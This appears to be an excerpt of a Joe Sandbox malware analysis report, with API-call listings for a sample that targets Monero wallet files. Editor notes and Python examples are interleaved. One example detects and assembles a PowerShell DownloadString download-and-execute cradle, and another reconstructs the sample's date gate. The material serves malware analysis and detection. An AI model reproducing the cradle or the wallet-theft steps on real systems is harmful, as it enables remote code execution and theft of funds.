                                            • Part of subcall function 00EA8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EA8E0B
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4801
                                          • lstrcat.KERNEL32(?,?), ref: 00EA4820
                                          • lstrcat.KERNEL32(?,?), ref: 00EA4834
                                          • lstrcat.KERNEL32(?,00BAA7C0), ref: 00EA4847
                                          • lstrcat.KERNEL32(?,?), ref: 00EA485B
                                          • lstrcat.KERNEL32(?,00BBE3C8), ref: 00EA486F
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EA8D90: GetFileAttributesA.KERNEL32(00000000,?,00E91B54,?,?,00EB564C,?,?,00EB0E1F), ref: 00EA8D9F
                                            • Part of subcall function 00EA4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00EA4580
                                            • Part of subcall function 00EA4570: RtlAllocateHeap.NTDLL(00000000), ref: 00EA4587
                                            • Part of subcall function 00EA4570: wsprintfA.USER32 ref: 00EA45A6
                                            • Part of subcall function 00EA4570: FindFirstFileA.KERNEL32(?,?), ref: 00EA45BD
                                          Similarity
                                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                          • String ID:
                                          • API String ID: 2540262943-0
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA2D85
                                          Strings
                                          • ')", xrefs: 00EA2CB3
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00EA2D04
                                          • <, xrefs: 00EA2D39
                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00EA2CC4
                                          Similarity
                                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          • API String ID: 3031569214-898575020
                                          • Opcode ID: f60393cdc16c4f80d2d0cba61579abd5bacd7c8ff0ee685c9c0910146a026ef7
                                          • Instruction ID: 0f80e88107a2bbd986614b18882d8b9cb3fe31456a9edbac28072443846aa7e2
                                          • Opcode Fuzzy Hash: f60393cdc16c4f80d2d0cba61579abd5bacd7c8ff0ee685c9c0910146a026ef7
                                          • Instruction Fuzzy Hash: E041CC71D103089ADB58EFA0C896BEEB7B4AF19300F445129F106BB191EF747A4ACF91
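The function above assembles a PowerShell download cradle from the fragments listed under Strings: the SysWOW64 powershell.exe path, the opening `-nop -c "iex(New-Object Net.WebClient).DownloadString('`, a URL that is filled in at runtime and does not appear on this page, and the closing `')"`, then launches it through ShellExecuteEx. The `<` string and the 0000003C argument are the same value, 0x3C = 60, the size of SHELLEXECUTEINFOA on 32-bit Windows, which the IDA plugin has rendered as a character rather than a cbSize. The Python below is an added example by the editor, not code from the report or from the sample: it matches that exact command-line shape in process-creation telemetry (also accepting the -noprofile / -command long forms and a quoted executable path) and pulls out the staging URL. The command lines and URLs in it are constructed for the example.

```python
import re

# Literal pieces recovered by the sandbox (the URL is supplied at runtime).
POWERSHELL_X86 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CRADLE_OPEN = "-nop -c \"iex(New-Object Net.WebClient).DownloadString('"
CRADLE_CLOSE = "')\""

# One regex for the assembled command line. The executable may be a bare name
# or a full path, optionally quoted; the switches accept the long aliases too.
CRADLE_RE = re.compile(
    r"""
    "?(?P<exe>(?:[A-Za-z]:\\[^\s"]*\\)?powershell(?:\.exe)?)"?
    \s+-no(?:p|profile)\s+-c(?:ommand)?\s+
    "iex\(New-Object\s+Net\.WebClient\)\.DownloadString\('(?P<url>[^']*)'\)"
    """,
    re.IGNORECASE | re.VERBOSE,
)


def match_cradle(cmdline):
    """Return details of a DownloadString cradle in cmdline, or None."""
    m = CRADLE_RE.search(cmdline)
    if not m:
        return None
    exe = m.group("exe")
    return {
        "exe": exe,
        "url": m.group("url"),
        # The sample hard-codes the 32-bit host; a SysWOW64 path on a 64-bit
        # box is itself a weak signal worth keeping.
        "wow64": exe.lower().startswith("c:\\windows\\syswow64\\"),
    }


def scan_command_lines(cmdlines):
    """Run match_cradle over a batch of process command lines."""
    hits = []
    for cmdline in cmdlines:
        hit = match_cradle(cmdline)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed sample telemetry: the first line is the shape the sample builds,
# the second is benign administration, the third uses a bare executable name.
SAMPLE_CMDLINES = [
    POWERSHELL_X86 + " " + CRADLE_OPEN + "http://example.invalid/stage2.ps1" + CRADLE_CLOSE,
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\scripts\backup.ps1',
    "powershell -noprofile -command \"iex(New-Object Net.WebClient).DownloadString('https://example.invalid/x')\"",
]

if __name__ == "__main__":
    for hit in scan_command_lines(SAMPLE_CMDLINES):
        print(hit)
```

Match on the structural pattern rather than on the exact SysWOW64 path: the path only tells you the sample is a 32-bit process, and a 64-bit build of the same family would use System32 with the same cradle.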
                                          APIs
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00E99F41
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocLocal
                                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                          • API String ID: 4171519190-1096346117
                                          • Opcode ID: 1956e5d38075074ba22cd44e49b4d6d6921adf7ae69a3ab22050201bc6d2419e
                                          • Instruction ID: 7ed90f9bf791811ec5f3f7da635589456ef2934204e581a5f44cafb32d501828
                                          • Opcode Fuzzy Hash: 1956e5d38075074ba22cd44e49b4d6d6921adf7ae69a3ab22050201bc6d2419e
                                          • Instruction Fuzzy Hash: 07612E71A002489BDF24EFA4CC96FEE77B5AF45300F449528F90A6F191EB746A05CB92
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,00BBE448,00000000,00020119,?), ref: 00EA40F4
                                          • RegQueryValueExA.ADVAPI32(?,00BBF6F8,00000000,00000000,00000000,000000FF), ref: 00EA4118
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA4122
                                          • lstrcat.KERNEL32(?,00000000), ref: 00EA4147
                                          • lstrcat.KERNEL32(?,00BBF710), ref: 00EA415B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$CloseOpenQueryValue
                                          • String ID:
                                          • API String ID: 690832082-0
                                          • Opcode ID: 35ba088877c02c2812b5016276889538f25e0888ac81216e43d4ab7713256495
                                          • Instruction ID: c289493b9636385fd0d48f3f04078f7c00507d34f2b69553ade794b507d27a34
                                          • Opcode Fuzzy Hash: 35ba088877c02c2812b5016276889538f25e0888ac81216e43d4ab7713256495
                                          • Instruction Fuzzy Hash: 65418BB6D00108ABDB24EBB0DC46FFE737DAB8C300F408558BA5557185EE756B888BD1
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 00EA696C
                                          • sscanf.NTDLL ref: 00EA6999
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EA69B2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00EA69C0
                                          • ExitProcess.KERNEL32 ref: 00EA69DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID:
                                          • API String ID: 2533653975-0
                                          • Opcode ID: ba8426dfad5bbf5fafc3d9239ed729132b4a6202520c6594916b6162179a72f3
                                          • Instruction ID: feab951dcdf6b6c978a9d582399491886e63e6c465cf159b640f2eb5d611488c
                                          • Opcode Fuzzy Hash: ba8426dfad5bbf5fafc3d9239ed729132b4a6202520c6594916b6162179a72f3
                                          • Instruction Fuzzy Hash: FD21EA75E00208ABCF08EFE4D945AEEB7B9BF4D300F04852AE416B7244EB356605CB69
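The API sequence in this entry, GetSystemTime, an sscanf of a string, two SystemTimeToFileTime conversions and a path to ExitProcess, has the shape of a date gate: the current time and a parsed date are both converted to FILETIME (a 64-bit count of 100-nanosecond ticks since 1601-01-01 UTC) so they can be compared as plain integers, and one outcome terminates the process. The page shows neither the sscanf format string nor which side of the comparison exits, so both are labelled assumptions in the Python below, which is the editor's reconstruction added as an example and is neither the sample's code nor taken from the report. What it does show reliably is the FILETIME arithmetic needed to turn the constants seen in such a comparison back into dates, and the reverse.

```python
import re
from datetime import datetime, timedelta, timezone

# SystemTimeToFileTime counts 100-ns ticks from this epoch.
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Same result as SystemTimeToFileTime on a SYSTEMTIME with these fields."""
    dt = datetime(year, month, day, hour, minute, second, ms * 1000, tzinfo=timezone.utc)
    delta = dt - EPOCH_1601
    return (delta.days * 86400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def filetime_to_datetime(ft):
    """Inverse helper for reading a FILETIME constant out of a disassembly."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


# ASSUMPTION: the sscanf target is a "DD.MM.YYYY" string. The real format
# string is not visible in the report; swap the regex for whatever it turns out to be.
DATE_RE = re.compile(r"^(\d{1,2})\.(\d{1,2})\.(\d{4})$")


def parse_expiry(text):
    """Stand-in for the sscanf call: returns the parsed date as a FILETIME."""
    m = DATE_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised date string: %r" % text)
    day, month, year = (int(x) for x in m.groups())
    return systemtime_to_filetime(year, month, day)


def date_gate_exits(now_ft, expiry_text):
    """True when the gate, as reconstructed, would reach ExitProcess.

    ASSUMPTION: the process exits once the current time is past the parsed
    date (a kill date). The comparison direction is not visible on the page.
    """
    return now_ft > parse_expiry(expiry_text)


if __name__ == "__main__":
    now = datetime.now(timezone.utc)
    now_ft = systemtime_to_filetime(now.year, now.month, now.day, now.hour, now.minute, now.second)
    print("now as FILETIME:", now_ft)
    print("gate exits for 01.01.2025:", date_gate_exits(now_ft, "01.01.2025"))
```

When the sandbox run ends in ExitProcess shortly after this function, re-running with the system clock set before the parsed date is the quickest way to confirm the gate and reach the rest of the sample.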
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7E37
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7E3E
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BABBC0,00000000,00020119,?), ref: 00EA7E5E
                                          • RegQueryValueExA.ADVAPI32(?,00BBE748,00000000,00000000,000000FF,000000FF), ref: 00EA7E7F
                                          • RegCloseKey.ADVAPI32(?), ref: 00EA7E92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: bc3e8c633dcd4049c92f54b0ee340adaf8a4f9b04ab1b55c18cc9f4c3db16d7f
                                          • Instruction ID: d18669b0358a01aa95805bcc7591db27950d44886bb54672d35c9b752393da86
                                          • Opcode Fuzzy Hash: bc3e8c633dcd4049c92f54b0ee340adaf8a4f9b04ab1b55c18cc9f4c3db16d7f
                                          • Instruction Fuzzy Hash: D41173B1B44205EBD710DF94DD4AFBBBBB8FB48710F108159FA46A7284D77969008BA0
                                          APIs
                                          • StrStrA.SHLWAPI(00BBF590,?,?,?,00EA140C,?,00BBF590,00000000), ref: 00EA926C
                                          • lstrcpyn.KERNEL32(010DAB88,00BBF590,00BBF590,?,00EA140C,?,00BBF590), ref: 00EA9290
                                          • lstrlen.KERNEL32(?,?,00EA140C,?,00BBF590), ref: 00EA92A7
                                          • wsprintfA.USER32 ref: 00EA92C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpynlstrlenwsprintf
                                          • String ID: %s%s
                                          • API String ID: 1206339513-3252725368
                                          • Opcode ID: 35473a13cf15fdcb1dc918171a55416839ce35744d699721893c7f303ecf3556
                                          • Instruction ID: ac56a2e49b367fbb491e50b9f4b4573b6554379064623017f46a88e28f4de275
                                          • Opcode Fuzzy Hash: 35473a13cf15fdcb1dc918171a55416839ce35744d699721893c7f303ecf3556
                                          • Instruction Fuzzy Hash: 0601CC75601208FFCB14DFECD984EAE7BB9FF48364F108548F9499B205C639AA41DB90
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E912B4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E912BB
                                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E912D7
                                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E912F5
                                          • RegCloseKey.ADVAPI32(?), ref: 00E912FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID:
                                          • API String ID: 3225020163-0
                                          • Opcode ID: 3538dd3488e3061178a9ab90b07efc0fa7bc6b53629e41b34afa3e5d2a14e569
                                          • Instruction ID: ac579f6bee30b1507a4f4d912b44960f1bcbc3d9376d0ab25000fa3d97753dbf
                                          • Opcode Fuzzy Hash: 3538dd3488e3061178a9ab90b07efc0fa7bc6b53629e41b34afa3e5d2a14e569
                                          • Instruction Fuzzy Hash: AE011DB9A40208FBDB10DFE0DC4AFAEB7B8EB48701F008159FE4597284D6759A018F50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: String___crt$Type
                                          • String ID:
                                          • API String ID: 2109742289-3916222277
                                          • Opcode ID: 9afff9c1a3a62e2409a240382f6fad6facb2ab3d74db01f0fb25ac13050d3749
                                          • Instruction ID: b2d1fbaeb91c116784263130fbef4944772e0278066dc033847260b357564514
                                          • Opcode Fuzzy Hash: 9afff9c1a3a62e2409a240382f6fad6facb2ab3d74db01f0fb25ac13050d3749
                                          • Instruction Fuzzy Hash: 8341EB7150475C9EDB258B24CC85FFB7BECAF4A708F2454E8E586AA182D271BA44CF60
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00EA6663
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00EA6726
                                          • ExitProcess.KERNEL32 ref: 00EA6755
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: <
                                          • API String ID: 1148417306-4251816714
                                          • Opcode ID: 77b68f898a8fc6e656020c370dfdd85448ed4be38232ddbaaa6abdcd4860fa69
                                          • Instruction ID: 85a876ec5a72179cea7aa4bb27e39bf90a614b4521b734681db2b28296fb3553
                                          • Opcode Fuzzy Hash: 77b68f898a8fc6e656020c370dfdd85448ed4be38232ddbaaa6abdcd4860fa69
                                          • Instruction Fuzzy Hash: A1312BB1D01218AADB54EB90DD86BDE77B8AF48300F405199F20A7B191DF787B48CF65
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EB0E28,00000000,?), ref: 00EA882F
